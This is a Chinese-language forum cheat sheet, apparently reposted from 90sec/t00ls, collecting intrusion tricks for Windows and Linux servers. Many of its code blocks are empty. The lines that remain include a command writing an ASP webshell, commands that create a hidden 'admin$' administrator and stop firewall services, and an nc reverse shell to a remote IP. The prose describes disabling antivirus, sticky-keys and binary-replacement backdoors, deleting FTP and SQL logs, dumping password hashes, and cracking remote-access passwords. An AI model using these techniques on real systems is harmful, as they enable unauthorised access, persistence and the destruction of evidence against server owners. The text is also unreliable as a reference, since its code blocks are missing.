各种提权/渗透/经验/技巧总结

原文由 sec[90sec] 分享

本文原件由0x童鞋收集整理,感谢0x童鞋,本人补充和优化了点,本文毫无逻辑可言,因为是想到什么就写了,大家见谅。

本着共享之精神,方便各位黑阔、童鞋,发表此文,希望抛砖引玉,童鞋们踊跃发言。使之更加完善,在交流中进步,形成良好的互动~~

感谢T00LS的童鞋们踊跃交流,让我学到许多经验,为了方便其他童鞋浏览,将T00LS的童鞋们补充的贴在下面,同时我也会以后将自己的一些想法跟新在后面。

大部分内容转至t00ls原帖,自己又加了一部分,修正了下板式,原帖太乱了!部分技巧虽然简单,但是异常实用,高手请勿喷,菜鸟请虚心学习。

旁站路径问题:

1、读网站配置。

2、用以下VBS:

 

3、iis_spy 列举(注:需要支持ASPX,反IISSPY的方法:将 activeds.dll,activeds.tlb 降权)。
4、得到目标站目录,不能直接跨的。可以通过“echo ^<%execute(request("cmd"))%^> >>X:\目标目录\X.asp”或者“copy 脚本文件 X:\目标目录\X.asp”像目标目录写入webshell,或者还可以试试type命令。

WordPress 的平台,爆绝对路径的方法是:

 

phpMyAdmin 爆路径办法:

 

网站可能目录(注:一般是虚拟主机类):

data/htdocs.网站/网站/

CMD 下操作 VPN 相关知识、资料:

#允许administrator拨入该VPN:

#禁止administrator拨入该VPN:

#查看哪些用户可以拨入VPN:

#查看VPN分配IP的方式:

#使用地址池的方式分配IP:

#地址池的范围是从192.168.3.1到192.168.3.254:

Cmd、Dos 命令行下添加 SQL 用户的方法:

需要有管理员权限,在命令下先建立一个“c:\test.qry”文件,内容如下:

然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry

另类的加用户方法:

在删掉了 net.exe 和不用 adsi 之外,新的加用户的方法。代码如下JS:

vbs:

Cmd 访问控制权限控制:

命令如下:

备注:反制方法,在文件夹安全设置里将 Everyone 设定为不可读,如果没有安全性选项:工具 - 文件夹选项 - 使用简单的共享去掉即可。

3389 相关,以下配合PR更好:

a、防火墙TCP/IP筛选.(关闭:net stop policyagent & net stop sharedaccess)

b、内网环境(lcx.exe)

c、终端服务器超出了最大允许连接(XP 运行:mstsc /admin;2003 运行:mstsc /console)

1.查询终端端口:

2.开启XP&2003终端服务:

3.更改终端端口为2008(十六进制为:0x7d8):

4.取消xp&2003系统防火墙对终端服务的限制及IP连接的限制:

MySql添加管理员,需重启:

BS马的PortMap功能,类似LCX做转发。若果支持ASPX,用这个转发会隐蔽点。

(注:一直忽略了在偏僻角落的那个功能)

关闭常见杀软(把杀软所在的文件的所有权限去掉):

处理变态诺顿企业版:

麦咖啡:

Symantec病毒日志:

Symantec病毒备份:

Nod32病毒备份:

Nod32移除密码保护:

删除“HKEY_LOCAL_MACHINE\SOFTWARE\ESET\ESET Security\CurrentVersion\Info\PackageID”即可

安装5次shift后门,沾滞键后门,替换SHIFT后门:

沾滞键后门:

替换SHIFT后门:

添加隐藏系统账号:

1、执行命令:“net user admin$ 123456 /add&net localgroup administrators admin$ /add”。

2、导出注册表SAM下用户的两个键值。

3、在用户管理界面里的 admin$ 删除,然后把备份的注册表导回去。

4、利用 Hacker Defender 把相关用户注册表隐藏。

安装 MSSQL 扩展后门:

处理服务器MSFTP日志:

在“C:\WINNT\system32\LogFiles\MSFTPSVC1\”下有 ex011120.log / ex011121.log / ex011124.log 三个文件,直接删除 ex0111124.log 不成功,显示“原文件...正在使用”。

当然可以直接删除“ex011120.log / ex011121.log”。然后用记事本打开“ex0111124.log”,删除里面的一些内容后,保存,覆盖退出,成功。

当停止“msftpsvc”服务后可直接删除“ex011124.log”。

MSSQL查询分析器连接记录清除:

MSSQL 2000 位于注册表如下:

找到连接过的信息删除。

MSSQL 2005 是在:

防BT系统拦截技巧,可以使用远程下载shell:

防BT系统拦截技巧,可以使用远程下载shell,也达到了隐藏自身的效果,也可以做为超隐蔽的后门,神马的免杀webshell,用服务器安全工具一扫通通挂掉了。

VNC、Radmin、PcAnywhere 的提权方法:

VNC提权:

首先利用 shell 读取 vnc 保存在注册表中的密文,然后再使用工具VNC4X破解。

注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\password

Radmin提权:

Radmin 默认端口是4899,先获取密码和端口,如下位置:

然后用HASH版连接。

PcAnywhere提权:

如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有 PcAnywhere 同时保存密码文件的目录是允许我们的IUSER权限访问,我们可以下载这个CIF文件到本地破解,再通过 PcAnywhere 从本机登陆服务器。

保存密码的CIF文件,不是位于PcAnywhere的安装目录,而且位于安装PcAnywhere所安装盘的:

如果PcAnywhere安装在“D:\program\”文件夹下,那么PcAnywhere的密码文件就保存在:“D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\”文件夹下。

搜狗输入法 PinyinUp.exe 提权:

搜狗输入法的“PinyinUp.exe”是可读可写的直接替换即可,位于搜狗安装目录下,例如:

搜狗拼音输入法,会定时调用这个文件进行升级,禁止还禁止不掉,呵呵,天然的后门。

WinWebMail 提权加用户:

WinWebMail目录下的web必须设置everyone权限可读可写,在开始程序里,找到WinWebMail快捷方式,接下来,看路径,访问“路径\web”传 shell,访问shell后,权限是system,直接放远控进启动项,等待下次重启。

没有删cmd组件的可以直接加用户,7i24的web目录也是可写,权限为administrator。

1433 SA权限构建注入点:

liunx 相关提权渗透技巧总结,一、ldap 渗透技巧:

1.cat /etc/nsswitch

看看密码登录策略我们可以看到使用了file ldap模式

2.less /etc/ldap.conf

找到ou,dc,dc设置

3.查找管理员信息

匿名方式

有密码形式

4.查找10条用户记录

渗透实战:

1.返回所有的属性

2.查看基类

3.查找

liunx 相关提权渗透技巧总结,二、NFS 渗透技巧:

列举IP:showmount -e ip

liunx 相关提权渗透技巧总结,三、rsync渗透技巧:

1.查看rsync服务器上的列表:

看相应的下级目录(注意一定要在目录后面添加上/)

2.下载rsync服务器上的配置文件

3.向上更新rsync文件(成功上传,不会覆盖)

liunx 相关提权渗透技巧总结,四、squid渗透技巧:

liunx 相关提权渗透技巧总结,五、SSH端口转发:

liunx 相关提权渗透技巧总结,六、joomla渗透小技巧:

确定版本:

重新设置密码:

liunx 相关提权渗透技巧总结,七、Linux添加UID为0的root用户:

liunx 相关提权渗透技巧总结,八、freebsd本地提权:

文件夹打包:

1.tar打包:

2.alzip打包(韩国)

{

注:

关于tar的打包方式,linux不以扩展名来决定文件类型。

若压缩的话tar -ztf *.tar.gz 查看压缩包里内容 tar -zxf *.tar.gz 解压

那么用这条比较好 tar -czf /home/public_html/*.tar.gz /home/public_html/--exclude= 排除文件*.gif 排除目录 /xx/xx/*

}

3.命令行RAR打包

提权先执行systeminfo

token 漏洞补丁号 KB956572

Churrasco kb952004

收集系统信息的脚本:

For windows:

--------------------------------------------------------------

----------------------------------------------------------------

For linux:

----------------------------------------------------------------

----------------------------------------------------------------------

Gethash 不免杀怎么获取本机 hash:

首先导出注册表:

注意权限问题,一般注册表默认sam目录是不能访问的。需要设置为完全控制以后才可以访问(界面登录的需要注意,system权限可以忽略)。

接下来就简单了,把导出的注册表,down 到本机,修改注册表头导入本机,然后用抓去hash的工具抓本地用户就OK了

hash 抓完了记得把自己的账户密码改过来哦!

当 GetHashes 获取不到 hash 时,可以用冰刃把 sam 复制到桌面。据我所知,某人是用这个方法虚拟机多次因为不知道密码而进不去!~

vbs 下载者:

1:

2:

Cmd 下目录的操作技巧:

列出d的所有目录:

把当前路径下文件夹的名字只有1-3个字母的显示出来:

以当前目录为搜索路径,把当前目录与下面的子目录的全部EXE文件列出:

以指定目录为搜索路径,把当前目录与下面的子目录的所有文件列出:

这个会显示a.txt里面的内容,因为/f的作用,会读出a.txt中:

delims=后的空格是分隔符,tokens是取第几个位置:

Linux 系统下的一些常见路径:

Windows 系统下的一些常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘):

各种网站的配置文件相对路径大全:

去除TCP IP筛选:

TCP/IP筛选在注册表里有三处,分别是:

分别用以下命令来导出注册表项:

然后再把三个文件里的:

改为:

再将以上三个文件分别用以下命令导入注册表即可:

Webshell 提权小技巧:

Cmd路径:c:\windows\temp\cmd.exe

Nc 也在同目录下,例如反弹cmdshell:

通常都不会成功。

而直接在 cmd 路径上输入:c:\windows\temp\nc.exe

命令输入:-vv ip 999 -e c:\windows\temp\cmd.exe

却能成功。。这个不是重点

我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。

--------------------------------------------------------------------------------------------------------------------------

EoF